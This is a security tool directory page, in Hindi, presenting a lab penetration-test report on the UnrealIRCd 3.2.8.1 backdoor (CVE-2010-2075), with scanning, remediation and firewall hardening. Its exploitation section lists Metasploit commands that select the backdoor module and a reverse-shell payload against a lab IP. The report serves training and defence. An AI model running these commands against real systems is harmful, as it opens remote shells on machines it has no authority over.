Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
unrealircd-backdoor-pentest-report — UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) के लिए Metasploitable3 पर नियंत्रित पेनटेस्ट लैब रिपोर्ट, निवारण चरणों सहित। | Kitploit
उपकरण/GitHubGitHub/elazab2005/unrealircd-backdoor-pentest-report
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
elazab2005/unrealircd-backdoor-pentest-report

unrealircd-backdoor-pentest-report

UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) के लिए Metasploitable3 पर नियंत्रित पेनटेस्ट लैब रिपोर्ट, निवारण चरणों सहित।

रिपॉजिटरी देखें
4 दिन पहलेअभी तक समीक्षित नहीं

🛡️ UnrealIRCd बैकडोर पेनेट्रेशन परीक्षण

एक नियंत्रित पेनेट्रेशन परीक्षण परियोजना जो एक पृथक प्रशिक्षण वातावरण में UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) की पहचान करने, उसका शोषण करने और उसे सुधारने पर केंद्रित है।

अस्वीकरण: यह परियोजना विशेष रूप से शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए, जानबूझकर कमजोर बनाए गए प्रयोगशाला वातावरण के विरुद्ध आयोजित की गई थी। किसी भी अनधिकृत प्रणाली को लक्षित नहीं किया गया था।


📌 परियोजना अवलोकन

यह परियोजना एक कमजोर UnrealIRCd 3.2.8.1 सेवा के विरुद्ध एक संपूर्ण भेद्यता मूल्यांकन और शोषण कार्यप्रवाह प्रदर्शित करती है।

मूल्यांकन में निम्नलिखित शामिल हैं:

  • सेवा खोज और गणना
  • कमजोर UnrealIRCd सेवा की पहचान
  • उजागर IRC सेवा का सत्यापन
  • Metasploit का उपयोग करके नियंत्रित शोषण
  • साक्ष्य संग्रह
  • सुरक्षा सुधार और हार्डनिंग
  • तकनीकी पेनेट्रेशन परीक्षण दस्तावेज़ीकरण

लक्ष्य

आइटमविवरण
लक्ष्यMetasploitable प्रयोगशाला वातावरण
लक्ष्य IP10.10.10.13
कमजोर सेवाUnrealIRCd
संस्करण3.2.8.1
प्रोटोकॉलIRC
पोर्ट6667/TCP
भेद्यताUnrealIRCd बैकडोर
CVECVE-2010-2075
गंभीरतागंभीर

NIST के राष्ट्रीय भेद्यता डेटाबेस के अनुसार, प्रभावित UnrealIRCd 3.2.8.1 वितरणों में एक बाह्य रूप से प्रस्तुत संशोधन शामिल था जो दूरस्थ हमलावरों को मनमाने कमांड निष्पादित करने की अनुमति दे सकता था।


🎯 उद्देश्य

इस मूल्यांकन के प्राथमिक उद्देश्य निम्नलिखित थे:

  1. लक्ष्य पर उजागर सेवाओं की पहचान करना।
  2. निर्धारित करना कि क्या UnrealIRCd सेवा कमजोर थी।
  3. नियंत्रित शोषण के माध्यम से भेद्यता को सत्यापित करना।
  4. सफल शोषण के संभावित प्रभाव का आकलन करना।
  5. तकनीकी साक्ष्य का दस्तावेज़ीकरण करना।
  6. उचित सुधार उपाय लागू करना।
  7. सत्यापित करना कि कमजोर सेवा सुरक्षित या अक्षम कर दी गई थी।

🧰 उपयोग किए गए उपकरण


🔎 कार्यप्रणाली

मूल्यांकन ने एक सरलीकृत पेनेट्रेशन परीक्षण कार्यप्रवाह का पालन किया:

root@kitploit:~
Reconnaissance
      ↓
Service Enumeration
      ↓
Vulnerability Identification
      ↓
Exploitation
      ↓
Evidence Collection
      ↓
Impact Assessment
      ↓
Remediation
      ↓
Verification

1. 🔍 सेवा खोज

पहला चरण लक्ष्य होस्ट पर उजागर सेवाओं की पहचान करना था।

मूल्यांकन ने निम्नलिखित पोर्ट पर सुन रही एक IRC सेवा की पहचान की:

root@kitploit:~
TCP/6667

सेवा UnrealIRCd 3.2.8.1 से जुड़ी थी, जो बैकडोर भेद्यता से प्रभावित होने के लिए जाना जाने वाला संस्करण है।

साक्ष्य

Port Scan

चित्र 1 — पोर्ट और सेवा गणना

TCP/6667 की खोज ने प्रारंभिक संकेत प्रदान किया कि एक IRC सेवा उजागर थी और आगे की जांच की आवश्यकता थी।


2. 🚨 भेद्यता पहचान

पहचाना गया UnrealIRCd संस्करण CVE-2010-2075 से जुड़ा था।

यह भेद्यता केवल एक पारंपरिक सॉफ़्टवेयर बग नहीं है। प्रभावित संग्रह में एक दुर्भावनापूर्ण संशोधन/बैकडोर था जिसने दूरस्थ कमांड निष्पादन सक्षम किया। NVD इस मुद्दे को DEBUG3_DOLOG_SYSTEM मैक्रो में बाह्य रूप से प्रस्तुत ट्रोजन हॉर्स के रूप में वर्णित करता है।

Rapid7 का Metasploit दस्तावेज़ीकरण संबंधित मॉड्यूल की पहचान इस प्रकार करता है:

root@kitploit:~
exploit/unix/irc/unreal_ircd_3281_backdoor

और इसे प्रभावित UnrealIRCd 3.2.8.1 संग्रहों में मौजूद दुर्भावनापूर्ण बैकडोर का शोषण करने वाले के रूप में वर्णित करता है।


3. 💥 नियंत्रित शोषण

भेद्यता को Metasploit Framework का उपयोग करके पृथक प्रयोगशाला वातावरण में सत्यापित किया गया था।

उदाहरण शोषण कार्यप्रवाह:

root@kitploit:~
msfconsole

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 10.10.10.13

set PAYLOAD cmd/unix/reverse

run

इस चरण का उद्देश्य यह सत्यापित करना था कि क्या दूरस्थ कमांड निष्पादन प्राप्त करने के लिए उजागर सेवा का दुरुपयोग किया जा सकता है।

Rapid7 इस Metasploit मॉड्यूल का दस्तावेज़ीकरण विशेष रूप से UnrealIRCd 3.2.8.1 बैकडोर के लिए करता है।

साक्ष्य

Exploitation Evidence

चित्र 2 — नियंत्रित शोषण साक्ष्य

साक्ष्य अधिकृत प्रयोगशाला लक्ष्य के विरुद्ध किए गए शोषण चरण को प्रदर्शित करता है।


4. ⚠️ सुरक्षा प्रभाव

बैकडोर का सफल शोषण एक हमलावर को प्रभावित UnrealIRCd प्रक्रिया के सुरक्षा संदर्भ में दूरस्थ रूप से कमांड निष्पादित करने की क्षमता प्रदान कर सकता है।

प्राप्त किए गए सटीक विशेषाधिकार उस खाते पर निर्भर करते हैं जिसके अंतर्गत IRC डेमॉन चल रहा है।

संभावित प्रभाव में निम्नलिखित शामिल हैं:

  • अनधिकृत कमांड निष्पादन
  • प्रारंभिक सिस्टम समझौता
  • समझौता किए गए खाते के लिए उपलब्ध फ़ाइलों तक पहुंच
  • आगे की स्थानीय गणना
  • संभावित विशेषाधिकार वृद्धि
  • संभावित स्थायित्व
  • यदि अतिरिक्त कमजोरियां मौजूद हैं तो संभावित पार्श्व गति

महत्वपूर्ण: संभावित प्रभाव को इस बात के प्रमाण के रूप में नहीं समझा जाना चाहिए कि इस मूल्यांकन के दौरान प्रत्येक सूचीबद्ध कार्रवाई की गई थी।

UnrealIRCd बैकडोर के लिए Nmap का दस्तावेज़ीकरण पुष्टि करता है कि भेद्यता का उपयोग दूरस्थ सिस्टम पर मनमाने कमांड निष्पादित करने के लिए किया जा सकता है।


5. 🛠️ सुधार

कमजोर UnrealIRCd इंस्टॉलेशन को उत्पादन वातावरण में उजागर नहीं रहना चाहिए।

अनुशंसित सुधार कार्रवाइयों में निम्नलिखित शामिल हैं:

तत्काल कार्रवाइयां

  1. समझौता/बैकडोर युक्त UnrealIRCd पैकेज हटाएं।
  2. इसे किसी वैध स्रोत से विश्वसनीय और सत्यापित संस्करण से बदलें।
  3. यदि IRC सेवा आवश्यक नहीं है तो उसे अक्षम करें।
  4. फ़ायरवॉल नियमों या नेटवर्क ACL का उपयोग करके IRC सेवाओं तक पहुंच प्रतिबंधित करें।
  5. समझौते के संकेतकों के लिए सिस्टम की समीक्षा करें।
  6. प्रमाणीकरण और सिस्टम लॉग की समीक्षा करें।
  7. यदि समझौते का संदेह है तो संभावित रूप से उजागर हुए क्रेडेंशियल बदलें।

नेटवर्क हार्डनिंग

यदि IRC आवश्यक नहीं है:

root@kitploit:~
sudo ufw deny 6667/tcp

यदि सेवा आवश्यक है, तो पहुंच को व्यापक रूप से उजागर करने के बजाय विश्वसनीय नेटवर्क तक सीमित किया जाना चाहिए।

सेवा हार्डनिंग

पसंदीदा दृष्टिकोण यह है कि कमजोर सॉफ़्टवेयर को हटाया जाए और केवल नेटवर्क फ़िल्टरिंग पर निर्भर रहने का प्रयास करने के बजाय एक समर्थित, विश्वसनीय रिलीज़ तैनात की जाए।


6. ✅ सुधार साक्ष्य

उचित सुरक्षा नियंत्रण लागू करने के बाद सुधार चरण का दस्तावेज़ीकरण किया गया।

Remediation Evidence

चित्र 3 — सुधार / हार्डनिंग साक्ष्य

सुधार साक्ष्य को सुधारात्मक कार्रवाइयां लागू होने के बाद सेवा और/या फ़ायरवॉल कॉन्फ़िगरेशन की स्थिति प्रदर्शित करना चाहिए।


📊 जोखिम आकलन

बैकडोर को दूरस्थ कमांड निष्पादन की अनुमति देने के लिए डिज़ाइन किया गया था और यह सामान्य IRC उपयोगकर्ता प्रतिबंधों से स्वतंत्र रूप से संचालित हो सकता था, जिससे कमजोर सेवा का उजागर होना एक महत्वपूर्ण सुरक्षा जोखिम बन जाता है।


📁 परियोजना संरचना

root@kitploit:~
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
    ├── port_scan.png
    ├── exploit_evidence.png
    └── remediation.png

📸 साक्ष्य सारांश

साक्ष्यविवरण
port_scan.pngउजागर IRC सेवा की खोज
exploit_evidence.pngनियंत्रित शोषण साक्ष्य
remediation.pngसुधार-पश्चात सुरक्षा/हार्डनिंग साक्ष्य

🧠 मुख्य सीख

यह मूल्यांकन कई महत्वपूर्ण पेनेट्रेशन परीक्षण अवधारणाओं को प्रदर्शित करता है:

  • हमले की सतह की पहचान के लिए सेवा गणना आवश्यक है।
  • सॉफ़्टवेयर संस्करण पहचान ज्ञात भेद्यताओं को प्रकट कर सकती है।
  • नेटवर्क-उजागर विरासत सेवा सीधा प्रारंभिक पहुंच मार्ग प्रदान कर सकती है।
  • शोषण हमेशा अधिकृत दायरे के भीतर किया जाना चाहिए।
  • पेनेट्रेशन परीक्षण निष्कर्षों का समर्थन करने के लिए तकनीकी साक्ष्य आवश्यक है।
  • सुधार को केवल उजागर सेवा को छिपाने के बजाय अंतर्निहित सुरक्षा मुद्दे को संबोधित करना चाहिए।
  • सुरक्षा रिपोर्टों को अवलोकित परिणामों को संभावित प्रभाव से स्पष्ट रूप से अलग करना चाहिए।

📚 संदर्भ

  • NIST राष्ट्रीय भेद्यता डेटाबेस — CVE-2010-2075
    CVE विवरण और भेद्यता विवरण।

  • Rapid7 भेद्यता डेटाबेस — UnrealIRCd 3.2.8.1 बैकडोर कमांड निष्पादन
    Metasploit मॉड्यूल दस्तावेज़ीकरण और तकनीकी विवरण।

  • Rapid7 Metasploit Framework — UnrealIRCd बैकडोर मॉड्यूल
    आधिकारिक Metasploit मॉड्यूल कार्यान्वयन।

  • Nmap NSE दस्तावेज़ीकरण — irc-unrealircd-backdoor
    UnrealIRCd बैकडोर का पता लगाने हेतु दस्तावेज़ीकरण।


⚖️ अस्वीकरण

यह रिपॉजिटरी विशेष रूप से साइबर सुरक्षा शिक्षा, अधिकृत पेनेट्रेशन परीक्षण और नियंत्रित वातावरण में सुरक्षा अनुसंधान के लिए है।

इस परियोजना में प्रदर्शित तकनीकों का उपयोग केवल उन्हीं प्रणालियों के विरुद्ध किया जाना चाहिए जिनके लिए स्पष्ट प्राधिकरण प्राप्त किया गया हो।

इन तकनीकों का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है।

टूल डाउनलोड करें
उपकरणउद्देश्य
Nmapपोर्ट स्कैनिंग और सेवा गणना
NetcatTCP सेवा कनेक्टिविटी परीक्षण
Metasploit Frameworkनियंत्रित शोषण
Linux CLIसिस्टम सत्यापन और हार्डनिंग
UFWफ़ायरवॉल कॉन्फ़िगरेशन
Pythonसहायक सुरक्षा/परीक्षण कार्य
श्रेणीआकलन
भेद्यताUnrealIRCd 3.2.8.1 बैकडोर
CVECVE-2010-2075
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकबैकडोर ट्रिगर करने के लिए कोई प्रमाणीकरण आवश्यक नहीं है
उपयोगकर्ता सहभागिताआवश्यक नहीं
प्रभावदूरस्थ कमांड निष्पादन
गंभीरतागंभीर